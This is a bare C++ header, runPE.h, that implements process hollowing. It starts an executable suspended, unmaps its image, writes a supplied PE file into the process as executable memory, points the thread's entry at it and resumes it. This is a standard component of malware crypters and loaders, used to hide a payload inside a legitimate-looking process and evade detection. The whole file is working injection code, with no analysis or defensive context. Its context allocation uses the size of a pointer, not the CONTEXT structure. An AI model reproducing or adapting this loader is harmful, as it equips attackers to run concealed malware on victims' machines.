runPE.h

1. typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
2.  
3. class runPE{
4. public:
5. void run(LPSTR szFilePath, PVOID pFile)
6. {
7.     PIMAGE_DOS_HEADER IDH;    
8.     PIMAGE_NT_HEADERS INH;    
9.     PIMAGE_SECTION_HEADER ISH;
10.     PROCESS_INFORMATION PI;    
11.     STARTUPINFOA SI;          
12.     PCONTEXT CTX;              
13.     PDWORD dwImageBase;        
14.     NtUnmapViewOfSection xNtUnmapViewOfSection;
15.     LPVOID pImageBase;        
16.     int Count;                
17.     IDH = PIMAGE_DOS_HEADER(pFile);
18.     if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
19.     {
20.         INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
21.         if (INH->Signature == IMAGE_NT_SIGNATURE)
22.         {
23.             RtlZeroMemory(&SI, sizeof(SI));
24.             RtlZeroMemory(&PI, sizeof(PI));
25.             if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
26.             {
27.                 CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
28.                 CTX->ContextFlags = CONTEXT_FULL;
29.                 if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
30.                 {
31.                     ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
32.                     if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
33.                     {
34.                         xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
35.                         xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
36.                     }
37.                     pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
38.                     if (pImageBase)
39.                     {
40.                         WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
41.                         for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
42.                         {
43.                             ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
44.                             WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
45.                         }
46.                         WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
47.                         CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
48.                         SetThreadContext(PI.hThread, LPCONTEXT(CTX));
49.                         ResumeThread(PI.hThread);
50.                     }
51.  
52.                 }
53.             }
54.         }
55.     }
56.     VirtualFree(pFile, 0, MEM_RELEASE);
57. }
58. };